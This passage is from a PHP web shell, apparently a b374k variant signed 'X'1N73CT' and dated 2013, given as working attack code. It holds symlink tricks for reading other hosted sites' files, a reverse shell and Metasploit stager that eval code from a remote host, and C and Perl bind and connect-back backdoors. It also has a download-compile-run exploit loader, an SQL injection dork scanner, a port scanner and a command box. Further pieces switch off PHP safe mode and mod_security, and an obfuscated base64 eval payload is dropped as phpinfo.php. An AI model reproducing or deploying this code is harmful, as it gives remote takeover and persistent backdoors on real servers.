AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n$write =@fopen (\'sym/.htaccess\',\'w\');\r\nfwrite($write ,$htaccess);\r\n@symlink(\'/\',\'sym/root\');\r\n$filelocation = basename(__FILE__);\r\n$read_named_conf = @file(\'/etc/named.conf\');\r\nif(!$read_named_conf)\r\n{\r\necho "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; \r\n}\r\nelse\r\n{\r\necho "<br><br><div class=\'tmp\'><table border=\'1\' bordercolor=\'#00ff00\' width=\'500\' cellpadding=\'1\' cellspacing=\'0\'><td>Domains</td><td>Users</td><td>symlink </td>";\r\nforeach($read_named_conf as $subject){\r\nif(eregi(\'zone\',$subject)){\r\npreg_match_all(\'#zone "(.*)"#\',$subject,$string);\r\nflush();\r\nif(strlen(trim($string[1][0])) >2){\r\n$UID = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$string[1][0]));\r\n$name = $UID[\'name\'] ;\r\n@symlink(\'/\',\'sym/root\');\r\n$name   = $string[1][0];\r\n$iran   = \'\\.ir\';\r\n$israel = \'\\.il\';\r\n$indo   = \'\\.id\';\r\n$sg12   = \'\\.sg\';\r\n$edu    = \'\\.edu\';\r\n$gov    = \'\\.gov\';\r\n$gose   = \'\\.go\';\r\n$gober  = \'\\.gob\';\r\n$mil1   = \'\\.mil\';\r\n$mil2   = \'\\.mi\';\r\n$malay\t= \'\\.my\';\r\n$china\t= \'\\.cn\';\r\n$japan\t= \'\\.jp\';\r\n$austr\t= \'\\.au\';\r\n$porn\t= \'\\.xxx\';\r\n$as\t\t= \'\\.uk\';\r\n$calfn\t= \'\\.ca\';\r\n\r\nif (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])\r\nor eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])\r\nor eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])\r\nor eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))\r\n{\r\n$name = "<div style=\' color: #FF0000 ; text-shadow: 0px 0px 1px red; \'>".$string[1][0].\'</div>\';\r\n}\r\necho "\r\n<tr>\r\n\r\n<td>\r\n<div class=\'dom\'><a target=\'_blank\' href=http://www.".$string[1][0].\'/>\'.$name.\' </a> </div>\r\n</td>\r\n\r\n<td>\r\n\'.$UID[\'name\']."\r\n</td>\r\n\r\n<td>\r\n<a href=\'sym/root/home/".$UID[\'name\']."/public_html\' target=\'_blank\'>Symlink </a>\r\n</td>\r\n\r\n</tr></div> ";\r\nflush();\r\n}\r\n}\r\n}\r\n}\r\n\r\necho "</center></table>";   \r\n\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'domain\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=domain" method="post">\r\n\r\n<?php\r\n\r\necho \'<br><br><center><h1>+--=[ local domain viewer ]=--+</h1></center><br><br><div class=content>\';\r\n\r\n$file = @implode(@file("/etc/named.conf"));\r\nif(!$file){ die("# can\'t ReaD -> [ /etc/named.conf ]"); }\r\npreg_match_all("#named/(.*?).db#",$file ,$r);\r\n$domains = array_unique($r[1]);\r\n//check();\r\n//if(isset($_GET[\'ShowAll\']))\r\n{\r\necho "<table align=center border=1 width=59% cellpadding=5>\r\n<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>\r\n<tr><td>Domain</td><td>User</td></tr>";\r\nforeach($domains as $domain){\r\n$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));\r\n\r\n\t\techo "<tr><td>$domain</td><td>".$user[\'name\']."</td></tr>";\r\n\t\t}\r\n\techo "</table>";\r\n\t}\r\n\r\necho \'</div>\';\r\n}\r\n//////////////////////////////////////////////////////\r\n/////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'tool\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=tool" method="post">\r\n<?php\r\n\r\nerror_reporting(0);\r\nfunction ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}\r\n$s_my_ip = gethostbyname($_SERVER[\'HTTP_HOST\']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class=\'mybox\' align=\'center\'><td><h2>Reverse shell ( php )</h2><form method=\'post\' actions=\'?y=<?php echo $pwd;?>&amp;x=\'tool\'><table class=\'tabnet\'><tr><td style=\'width:110px;\'>Your IP</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' name=\'rstarget4\' value=\'".$rstarget4."\' /></td></tr><tr><td>Port</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' name=\'sqlportb4\' value=\'".$rsportb4."\' /></td></tr></table><input type=\'submit\' name=\'xback_php\' class=\'inputzbut\' value=\'connect\' style=\'width:120px;height:30px;margin:10px 2px 0 2px;\' /><input type=\'hidden\' name=\'d\' value=\'".$pwd."\' /></form></td><td><hr color=\'#4C83AF\'><td><td><form method=\'POST\'><table class=\'tabnet\'><h2>Metasploit Connection </h2><tr><td style=\'width:110px;\'>Your IP</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' size=\'40\' name=\'yip\' value=\'".$my_ip."\' /></td></tr><tr><td>Port</td><td><input style=\'width:100%;\' class=\'inputz\' type=\'text\' size=\'5\' name=\'yport\' value=\'443\' /></td></tr></table><input class=\'inputzbut\' type=\'submit\' value=\'Connect\' name=\'metaConnect\' style=\'width:120px;height:30px;margin:10px 2px 0 2px;\'></form></td></div></center></table><br><br />";\r\necho $s_result;\r\nif($_POST[\'metaConnect\']){$ipaddr = $_POST[\'yip\'];$port = $_POST[\'yport\'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable(\'stream_socket_client\')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = \'stream\';}elseif (is_callable(\'fsockopen\')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = \'stream\';}elseif (is_callable(\'socket_create\')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = \'socket\';}else {die();}switch ($msgsock_type){case \'stream\': $len = fread($msgsock, 4); break;case \'socket\': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a[\'len\'];$buffer = \'\';while (strlen($buffer) < $len){switch ($msgsock_type) {case \'stream\': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case \'socket\': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}\r\nif(isset($_REQUEST[\'sqlportb4\'])) $rsportb4 = ss($_REQUEST[\'sqlportb4\']);\r\nif(isset($_REQUEST[\'rstarget4\'])) $rstarget4 = ss($_REQUEST[\'rstarget4\']);\r\nif ($_POST[\'xback_php\']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = \'/bin/sh\';$daemon = 0;$debug = 0;if(function_exists(\'pcntl_fork\')){$pid = pcntl_fork();\r\nif ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}\r\numask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);\r\n$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));\r\n$process = proc_open($shell, $descriptorspec, $pipes);\r\nif(!is_resource($process)) exit(1);\r\nstream_set_blocking($pipes[0], 0);\r\nstream_set_blocking($pipes[1], 0);\r\nstream_set_blocking($pipes[2], 0);\r\nstream_set_blocking($sock, 0);\r\nwhile(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\r\nif(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}\r\nif(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}\r\nif(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}\r\n}\r\n////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'whois\'))\r\n   {\r\n   ?>\r\n   <form action="?y=<?php echo $pwd; ?>&x=whois" method="post">\r\n   <?php\r\n   @set_time_limit(0);\r\n   @error_reporting(0);\r\n   function sws_domain_info($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/whois/$site");\r\n   flush();\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_net_info($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/asinfo/$site");\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_site_ser($site)\r\n   {\r\n   $getip = @file_get_contents("http://networktools.nl/reverseip/$site");\r\n   $ip = @findit($getip,\'<pre>\',\'</pre>\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_sup_dom($site)\r\n   {\r\n   $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");\r\n   $ip = @findit($getip,\'<strong>Nameservers found:</strong>\',\'<script type="text/javascript">\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_port_scan($ip)\r\n   {\r\n   $list_post = array(\'80\',\'21\',\'22\',\'2082\',\'25\',\'53\',\'110\',\'443\',\'143\');\r\n   foreach ($list_post as $o_port)\r\n   {\r\n   $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);\r\n   if($connect)\r\n   {\r\n   echo " $ip : $o_port ??? <u style=\\"color: #00ff00\\">Open</u> <br /><br />";\r\n   flush();\r\n   }\r\n   }\r\n   }\r\n   function findit($mytext,$starttag,$endtag) {\r\n   $posLeft = @stripos($mytext,$starttag)+strlen($starttag);\r\n   $posRight = @stripos($mytext,$endtag,$posLeft+1);\r\n   return @substr($mytext,$posLeft,$posRight-$posLeft);\r\n   flush();\r\n   }\r\n   echo \'<br><br><center>\';\r\n   echo \'\r\n    <br />\r\n    <div class="sc"><form method="post"><table class="tabnet">\r\n\t<tr><th colspan="5">Website Whois</th></tr>\r\n    <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#00ff00;background-color:#000000" class="inputz" value="site.com" /> &nbsp <input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan !" /></td></tr>\r\n    </table></form></div>\';\r\n   if(isset($_POST[\'scan\']))\r\n   {\r\n   $site = @htmlentities($_POST[\'site\']);\r\n   if (empty($site)){die(\'<br /><br /> Not add IP .. !\');}\r\n   $ip_port = @gethostbyname($site);\r\n   echo "\r\n   <br /><div class=\\"sc2\\">Scanning [ $site ip $ip_port ] ... </div>\r\n   <div class=\\"tit\\"> <br /><br />|-------------- Port Server ------------------| <br /></div>\r\n   <div class=\\"ru\\"> <br /><br /><pre>\r\n   ";\r\n   echo "".sws_port_scan($ip_port)." </pre></div> ";\r\n   flush();\r\n   echo "<div class=\\"tit\\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_domain_info($site)."</pre></div>";\r\n   flush();\r\n   echo "\r\n   <div class=\\"tit\\"> <br /><br />|-------------- Network Info ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_net_info($site)."</pre> </div>";\r\n   flush();\r\n   echo "<div class=\\"tit\\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_sup_dom($site)."</pre> </div>";\r\n   flush();\r\n   echo "<div class=\\"tit\\"> <br /><br />|-------------- Site Server ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_site_ser($site)."</pre> </div>\r\n   <div class=\\"tit\\"> <br /><br />|-------------- END ------------------| <br /></div>";\r\n   flush();\r\n   }\r\n   echo \'</center>\';\r\n   }\r\n///////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'about\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=about" method="post">\r\n\t<center><br><br><img src=\'http://i.imgur.com/3m7leCw.jpg\'>\r\n    <br><br><br>terimakasih buat teman2 ku yang mau membantu saya menyelesaikan shell saya yang versi v3.1 spesial edition ini\r\n\t<br><br>[ s4mp4h | areg noid | Mr Gãndrunx (Hiddenymouz) | ardan | FH04ZA | antonio HSH | war0x | x shadow | bagonk ]<br>dan semua kawan-kawan ku\r\n\t<br><br><font size="5" color="#00ff00">Tanks to:</font></center><center>\r\n<marquee direction="up" scrollamount="2" bgcolor="" width="250" height="40"><center>\r\n<p><b><font size="3" color="#00ff00">=[ teman-temanku ]=<br><br>Gabby<br>Antonio HSH<br>R10<br>w4r0x<br>edelle007<br>Brian kamikaze<br>Clover Lepex<br>\r\nUyap<br>\r\nZinbad<br>FH04ZA<br>\r\nSani marpic<br>\r\nMadan Cyber<br>\r\nCah Bagus<br>\r\nRPG<br>Vallent<br>\r\nP4njie_a.k.a<br>\r\nDwi Syntia<br>\r\nÆrul Ringgo\'s<br>\r\nTi\'ar Variabel<br>\r\nImei7<br>\r\nHmei7<br>\r\nDe Vinclous<br>\r\nBlankon33<br>\r\nDoza Cracker<br>\r\nYing Cracker<br>\r\nIranian Hacker<br>\r\nDanger Hacker<br>\r\nAdmin07<br>\r\nZhou you<br>\r\nKsatria.us<br>\r\nCyber Inj3cti0n<br>\r\nK2ll33d<br>\r\nSultan Haikal<br>\r\nSyntax_Error<br>\r\nAqis<br>\r\nBlack Shadow<br>\r\ncrack999<br>\r\nFnatic Crew<br>\r\nCoretan Rizal<br>\r\nMalaikat Maut<br>\r\nDan teman-teman ku semua<br><br>\r\n=[ grup hacking ]=<br><br>\r\nBlack Newbie Team<br>\r\n3xpire Cyber Army<br>\r\nHack Forum<br>\r\nIndonesia Fighter Cyber<br>\r\nBiang Kerox Team<br>\r\nAnonymous<br>Gaza Hacker<br>Albanian Hacker<br>Devilz c0de<br>Muslims Cyber Shellz<br>\r\nX-Code<br>\r\nIndonesian Security<br>\r\nIndonesia Black Cyber<br>\r\nB-Compi<br>\r\nJasakom<br>\r\nMojopahit Fighter Cyber<br>\r\nLappis<br>\r\nMojopahit Cyber Dark<br>\r\nCrack Hack Forum<br>\r\ndan semua grup hacking<br>\r\nyang<br>\r\nsaya naungi dan singgahi<br><br><br>By<br>Cyber173 a.k.a X\'1n73ct<br><br><br>\r\n</font></b></p>\r\n</center>\r\n</marquee></center><br><br><br>\r\n<?php\r\n}\r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'sqli-scanner\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=sqli-scanner" method="post">\r\n\r\n<?php\r\n\r\necho \'<br><br><center><form method="post" action=""><b><font color="green">Dork : </font></b> &nbsp;&nbsp;<input class="inputz" type="text" value="" name="dork" style="color:#00ff00;background-color:#000000" size="20"/><input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan"></form></center>\';\r\n\r\nob_start();\r\nset_time_limit(0);\r\n\r\nif (isset($_POST[\'scan\'])) {\r\n\r\n$browser = $_SERVER[\'HTTP_USER_AGENT\'];\r\n\r\n$first = "startgoogle.startpagina.nl/index.php?q=";\r\n$sec = "&start=";\r\n$reg = \'/<p class="g"><a href="(.*)" target="_self" onclick="/\';\r\n\r\nfor($id=0 ; $id<=30; $id++){\r\n$page=$id*10;\r\n$dork=urlencode($_POST[\'dork\']);\r\n$url = $first.$dork.$sec.$page;\r\n\r\n$curl = curl_init($url);\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'$browser)\');\r\n$result = curl_exec($curl);\r\ncurl_close($curl);\r\n\r\npreg_match_all($reg,$result,$matches);\r\n}\r\nforeach($matches[1] as $site){\r\n\r\n$url = preg_replace("/=/", "=\'", $site);\r\n$curl=curl_init();\r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1);\r\ncurl_setopt($curl,CURLOPT_URL,$url);\r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'$browser)\');\r\ncurl_setopt($curl,CURLOPT_TIMEOUT,\'5\');\r\n$GET=curl_exec($curl); \r\nif (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row()|SELECT * \r\n\r\nFROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) { \r\necho \'<center><b><font color="#E10000">Found : </font><a href="\'.$url.\'" target="_blank">\'.$url.\'</a><font color=#FF0000> &#60;-- SQLI Vuln \r\n\r\nFound..</font></b></center>\';\r\nob_flush();flush(); \r\n}else{ \r\necho \'<center><font color="#FFFFFF"><b>\'.$url.\'</b></font><font color="#0FFF16"> &#60;-- Not Vuln</font></center>\';\r\nob_flush();flush(); \r\n}\r\nob_flush();flush();\r\n}\r\nob_flush();flush();\r\n}\r\nob_flush();flush();\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'upload\')){ \r\nif(isset($_POST[\'uploadcomp\'])){\r\n\tif(is_uploaded_file($_FILES[\'file\'][\'tmp_name\'])){\r\n\t\t$path = magicboom($_POST[\'path\']);\r\n\t\t$fname = $_FILES[\'file\'][\'name\'];\r\n\t\t$tmp_name = $_FILES[\'file\'][\'tmp_name\'];\r\n\t\t$pindah = $path.$fname;\r\n\t\t$stat = @move_uploaded_file($tmp_name,$pindah);\t\t\r\n\t\tif ($stat) {\r\n\t\t\t$msg = "file uploaded to $pindah";\r\n\t\t}\r\n\t\telse $msg = "failed to upload $fname";\r\n\t}\r\n\telse $msg = "failed to upload $fname";\r\n}\r\nelseif(isset($_POST[\'uploadurl\'])){\r\n\t$pilihan = trim($_POST[\'pilihan\']);\r\n\t$wurl = trim($_POST[\'wurl\']);\r\n\t$path = magicboom($_POST[\'path\']);\r\n\t$namafile = download($pilihan,$wurl);\r\n\t$pindah = $path.$namafile;\r\n\tif(is_file($pindah)) {\r\n\t\t$msg = "file uploaded to $pindah";\r\n\t}\r\n\telse $msg = "failed to upload $namafile";\r\n\r\n}\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">\r\n<table class="tabnet" style="width:320px;padding:0 1px;">\r\n<tr><th colspan="2">Upload from computer</th></tr>\r\n<tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>\r\n<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>\r\n</tr>\r\n</table></form>\r\n<table class="tabnet" style="width:320px;padding:0 1px;">\r\n<tr><th colspan="2">Upload from url</th></tr>\r\n<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">\r\n<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>\r\n<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>\r\n<tr><td><select size="1" class="inputz" name="pilihan">\r\n<option value="wwget">wget</option>\r\n<option value="wlynx">lynx</option>\r\n<option value="wfread">fread</option>\r\n<option value="wfetch">fetch</option>\r\n<option value="wlinks">links</option>\r\n<option value="wget">GET</option>\r\n<option value="wcurl">curl</option>\r\n</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>\r\n</tr>\r\n</table>\r\n<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>\r\n<?php }\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'netsploit\')){ \r\n\r\n// bind connect with c\r\nif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'C\')) {\r\n\t$port = trim($_POST[\'port\']);\r\n\t$passwrd = trim($_POST[\'bind_pass\']);\r\n\ttulis("bdc.c",$port_bind_bd_c);\r\n \texe("gcc -o bdc bdc.c");\r\n \texe("chmod 777 bdc");\r\n \t@unlink("bdc.c");\r\n \texe("./bdc ".$port." ".$passwrd." &");\r\n \t$scan = exe("ps aux"); \r\n\tif(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }\r\n\telse { $msg =  "<p>Process not found running, backdoor not setup successfully.</p>"; }\r\n}\r\n// bind connect with perl\r\nelseif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'Perl\')) {\r\n\t$port = trim($_POST[\'port\']);\r\n\t$passwrd = trim($_POST[\'bind_pass\']);\r\n\ttulis("bdp",$port_bind_bd_pl);\r\n\texe("chmod 777 bdp");\r\n \t$p2=which("perl");\r\n \texe($p2." bdp ".$port." &");\r\n \t$scan = exe("ps aux"); \r\n\tif(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }\r\n\telse { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }\r\n}\r\n// back connect with c\r\nelseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'C\')) {\r\n\t$ip = trim($_POST[\'ip\']);\r\n\t$port = trim($_POST[\'backport\']);\r\n\ttulis("bcc.c",$back_connect_c);\r\n \texe("gcc -o bcc bcc.c");\r\n \texe("chmod 777 bcc");\r\n \t@unlink("bcc.c");\r\n\texe("./bcc ".$ip." ".$port." &");\r\n\t$msg = "Now script try connect to ".$ip." port ".$port." ...";\r\n}\r\n// back connect with perl\r\nelseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'Perl\')) {\r\n\t$ip = trim($_POST[\'ip\']);\r\n\t$port = trim($_POST[\'backport\']);\r\n\ttulis("bcp",$back_connect);\r\n\texe("chmod +x bcp");\r\n\t$p2=which("perl");\r\n \texe($p2." bcp ".$ip." ".$port." &");\r\n \t$msg = "Now script try connect to ".$ip." port ".$port." ...";\r\n}\r\nelseif (isset($_POST[\'expcompile\']) && !empty($_POST[\'wurl\']) && !empty($_POST[\'wcmd\']))\r\n{\r\n\t$pilihan = trim($_POST[\'pilihan\']);\r\n\t$wurl = trim($_POST[\'wurl\']);\r\n\t$namafile = download($pilihan,$wurl);\r\n\tif(is_file($namafile)) {\r\n\t\r\n\t$msg = exe($wcmd);\r\n\t}\r\n\telse $msg = "error: file not found $namafile";\r\n}\r\n\r\n?>\r\n<table class="tabnet">\r\n<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>\r\n<tr>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>\r\n<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>\r\n<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>\r\n<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>\r\n</table>\r\n</td>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv(\'REMOTE_ADDR\')) ? (getenv(\'REMOTE_ADDR\')) : ("127.0.0.1")); ?>"></td></tr>\r\n<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>\r\n<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>\r\n<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>\r\n</table>\r\n</td>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>\r\n<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>\r\n</tr>\r\n<tr><td><select size="1" class="inputz" name="pilihan">\r\n<option value="wwget">wget</option>\r\n<option value="wlynx">lynx</option>\r\n<option value="wfread">fread</option>\r\n<option value="wfetch">fetch</option>\r\n<option value="wlinks">links</option>\r\n<option value="wget">GET</option>\r\n<option value="wcurl">curl</option>\r\n</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>\r\n</table>\r\n</td>\r\n</tr>\r\n</table>\r\n<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>\r\n<?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'shell\')){  ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">\r\n<table class="cmdbox">\r\n<tr><td colspan="2">\r\n<textarea class="output" readonly>\r\n<?php\r\nif(isset($_POST[\'submitcmd\'])) {\r\n\techo @exe($_POST[\'cmd\']);\r\n}\r\n?>\r\n</textarea>\r\n<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>\r\n</table>\r\n</form>\r\n<?php } \r\nelse { \r\nif(isset($_GET[\'delete\']) && ($_GET[\'delete\'] != "")){\r\n\t$file = $_GET[\'delete\'];\r\n\t@unlink($file);\r\n}\r\nelseif(isset($_GET[\'fdelete\']) && ($_GET[\'fdelete\'] != "")){\r\n\t@rmdir(rtrim($_GET[\'fdelete\'],DIRECTORY_SEPARATOR));\r\n}\r\nelseif(isset($_GET[\'mkdir\']) && ($_GET[\'mkdir\'] != "")){\r\n\t$path = $pwd.$_GET[\'mkdir\'];\r\n\t@mkdir($path);\r\n}\r\n\t$buff = showdir($pwd,$prompt);\r\n\techo $buff;\r\n}\r\n?>\r\n<br><input class=inputzbut align=left type=submit name=ini value="Bypass Disable Functions and Safemode" />\r\n<?php\r\nif(isset($_POST[\'ini\']))\r\n\t{\r\n\t\t\r\n$byphp = "safe_mode = Off\r\ndisable_functions = None\r\nsafe_mode_gid = OFF\r\nopen_basedir = OFF\r\nallow_url_fopen = On";\r\n$byht = "<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\nSecFilterCheckURLEncoding Off\r\nSecFilterCheckUnicodeEncoding Off\r\n</IfModule>";\r\nfile_put_contents("php.ini",$byphp);\r\nfile_put_contents(".htaccess",$byht);\r\necho "<script>alert(\'Disable Functions and Safemode Created\'); hideAll();</script>";\r\ndie();\r\n\t\t\r\n\t\t}\r\n\r\n?><center><br><br><div class="info">-=[ b374k r3c0ded by <b>X\'1N73CT</b> ]=-</div><br>\r\n<div class="jaya">&copy; 2013 X\'1N73CT</div></center><br><br>\r\n</script>\r\n</div>\r\n<?php\r\n\r\n$ikrhtfy = $_SERVER["DOCUMENT_ROOT"].\'/\'.\'phpinfo.php\';\r\n\r\n\r\n$fghky_ouvcbt = \'<?php phpinfo();\r\n\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = 